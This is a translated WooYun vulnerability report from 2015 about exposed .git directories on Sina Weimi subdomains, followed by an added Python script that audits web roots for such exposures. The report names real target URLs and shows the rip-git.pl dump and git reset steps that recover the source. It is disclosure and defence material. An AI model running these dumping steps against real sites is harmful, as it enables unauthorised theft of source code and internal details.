
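Vulnerability summary

Bug ID: wooyun-2015-090998

Title: Misconfiguration on multiple Sina Weimi sites allows project source code to be reconstructed

Vendor: Sina

Author: 爱上平顶山

Submitted: 2015-01-12 12:25

Fixed: 2015-02-26 12:26

Publicly disclosed: 2015-02-26 12:26

Vulnerability type: System/service operations misconfiguration

Severity: Medium

Self-assessed rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]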



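Vulnerability details

Disclosure status:

2015-01-12: Details reported to the vendor; awaiting vendor handling
2015-01-12: Vendor confirmed; details disclosed to the vendor only
2015-01-22: Details disclosed to core white hats and experts in related fields
2015-02-01: Details disclosed to regular white hats
2015-02-11: Details disclosed to intern white hats
2015-02-26: Details disclosed to the public

Brief description:

Sina Weimi
The Sina Weibo Fund made a strategic investment in Weimi; in addition, Sina appointed its group vice president and Sina Weibo Fund partner, Peng Shaobin (彭少彬), as Weimi's executive director and CEO.

Detailed description:

Sina Weimi
http://www.weimi.me/.git/config
http://top.weimi.me/.git/config
http://code.weimi.me/.git/config
http://activity.weimi.me/.git/config
http://admin.weimi.me/.git/config (admin back end)
http://star.weimi.me/.git/config (accessible)
First, pull it down with a Perl script: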

D:\perl\perl\bin>perl.exe rip-git.pl -v -u http://star.weimi.me/.git/ >1.txt
[i] Downloading git files from http://star.weimi.me/.git/
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[d] found packed-refs
[d] found objects/info/alternates
[d] found info/grafts
[d] found logs/HEAD
[d] found refs/heads/master
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
error: inflate: data stream error (invalid code lengths set)
error: unable to unpack 04577b3615857df8600487f671a20cd7bfa0d4fe header
error: inflate: data stream error (invalid code lengths set)
fatal: loose object 04577b3615857df8600487f671a20cd7bfa0d4fe (stored in .git/obj
ects/04/577b3615857df8600487f671a20cd7bfa0d4fe) is corrupt
Import it into git:
root@kail:~/.git# ls -al
总用量 68
drwxrwxrwx 6 root root 4096 1月 10 10:52 .
drwxr-xr-x 31 root root 4096 1月 10 11:00 ..
-rwxrw-rw- 1 root root 40 1月 10 10:52 COMMIT_EDITMSG
-rwxrw-rw- 1 root root 280 1月 10 10:52 config
-rwxrw-rw- 1 root root 74 1月 10 10:52 description
-rwxrw-rw- 1 root root 24 1月 10 10:52 HEAD
-rwxrw-rw- 1 root root 23074 1月 10 10:52 index
drwxrwxrwx 2 root root 4096 1月 10 10:52 info
drwxrwxrwx 3 root root 4096 1月 10 10:52 logs
drwxrwxrwx 77 root root 4096 1月 10 10:52 objects
-rwxrw-rw- 1 root root 109 1月 10 10:52 packed-refs
drwxrwxrwx 5 root root 4096 1月 10 10:52 refs
Take a look:
root@kail:~/.git# cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = git@gitlab.hiwemeet.com:beijing_php/star.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
Then:
root@kail:~/.git# git reset --hard
That's all it takes.


ok

Proof of vulnerability:

···

Fix:

Delete it~

Copyright notice: when reposting, credit the source 爱上平顶山@乌云 (WooYun)
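
An added example, not part of the original report: since the fix is to delete the exposed `.git` directories, a pre-deployment audit like this one walks a document root for version-control metadata, reads the remote URL from each `.git/config`, and counts loose objects (a populated object store is what allows the source to be rebuilt). The sample tree, the host name in it and all function names are constructed for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

VCS_DIRS = {".git", ".svn", ".hg"}  # metadata directories that must not be served
SECTION_RE = re.compile(r'^\[\s*([\w.-]+)(?:\s+"([^"]*)")?\s*\]$')
LOOSE_RE = re.compile(r"^[0-9a-f]{38}$")

# Constructed sample config; the remote host is a placeholder.
SAMPLE_CONFIG = """[core]
\tbare = false
[remote "origin"]
\turl = git@gitlab.internal.example:team/star.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
\tremote = origin
"""


def git_remotes(config_path):
    """Return {remote_name: url} parsed from a .git/config file."""
    remotes, current = {}, None
    try:
        text = Path(config_path).read_text(encoding="utf-8", errors="replace")
    except OSError:
        return remotes
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        section = SECTION_RE.match(line)
        if section:
            # Only [remote "<name>"] sections carry the upstream URL.
            current = section.group(2) if section.group(1).lower() == "remote" else None
        elif current is not None and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key.lower() == "url":
                remotes[current] = value
    return remotes


def count_loose_objects(git_dir):
    """Count loose objects stored as objects/<2 hex>/<38 hex>."""
    objects, total = Path(git_dir) / "objects", 0
    if objects.is_dir():
        for fan in objects.iterdir():
            if fan.is_dir() and re.fullmatch(r"[0-9a-f]{2}", fan.name):
                total += sum(1 for f in fan.iterdir() if LOOSE_RE.match(f.name))
    return total


def audit_docroot(docroot):
    """List every VCS metadata directory found under a web document root."""
    findings = []
    for dirpath, dirnames, _ in os.walk(docroot):
        for name in sorted(VCS_DIRS.intersection(dirnames)):
            meta = Path(dirpath) / name
            finding = {"path": meta.relative_to(docroot).as_posix(),
                       "type": name[1:], "remotes": {}, "loose_objects": 0}
            if name == ".git":
                finding["remotes"] = git_remotes(meta / "config")
                finding["loose_objects"] = count_loose_objects(meta)
            findings.append(finding)
            dirnames.remove(name)  # do not descend into the metadata itself
    return sorted(findings, key=lambda f: f["path"])


def demo():
    """Audit a constructed document root built in a temporary directory."""
    with tempfile.TemporaryDirectory() as root:
        git = Path(root, "site_a", ".git")
        (git / "objects" / "ab").mkdir(parents=True)
        for fill in "01":
            (git / "objects" / "ab" / (fill * 38)).write_bytes(b"")
        (git / "config").write_text(SAMPLE_CONFIG, encoding="utf-8")
        Path(root, "site_b", "static", ".svn").mkdir(parents=True)
        Path(root, "site_c").mkdir()
        return audit_docroot(root)


if __name__ == "__main__":
    for item in demo():
        print(item)
```

Any finding means the deployment copied a working tree into the web root; removing the directory, or deploying from an export that never contains it, closes the exposure.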


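Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 6

Confirmed: 2015-01-12 19:08

Vendor reply:

Thank you for your attention to Sina security; the vulnerability is being fixed.

Latest status:

None yet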


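Vulnerability comments:

Comments

  1. 2015-01-12 12:34 | 疯狗 Certified white hat ( Intern white hat | Rank:44 Vulnerabilities:2 | Having read every vulnerability under heaven, the mind is naturally free of code.)

    What does "project source code can be reconstructed" mean? Changing the project's contents?

  2. 2015-01-12 12:43 | 爱上平顶山 Certified white hat ( Core white hat | Rank:2738 Vulnerabilities:547 | [No hat] A traveler in a foreign land. Formerly employed at a certain agency of the Celestial Empire. IT...)

    @疯狗 Restoring the project's source code. WooYun: From source reconstruction to GetShell on a PetroChina site

  3. 2015-01-12 13:01 | he1renyagao ( Regular white hat | Rank:225 Vulnerabilities:29 | Gold will always shine; before it shines, polish it first...)

    @爱上平顶山 struts+tomcat+nginx web.xml, a similar issue??

  4. 2015-01-12 13:18 | 孤独雪狼 ( Regular white hat | Rank:710 Vulnerabilities:145 | Phone got stolen on Qixi, what a rotten Qixi ....)

    Looks like hoarding bugs is a bad habit.... my stockpile is gone again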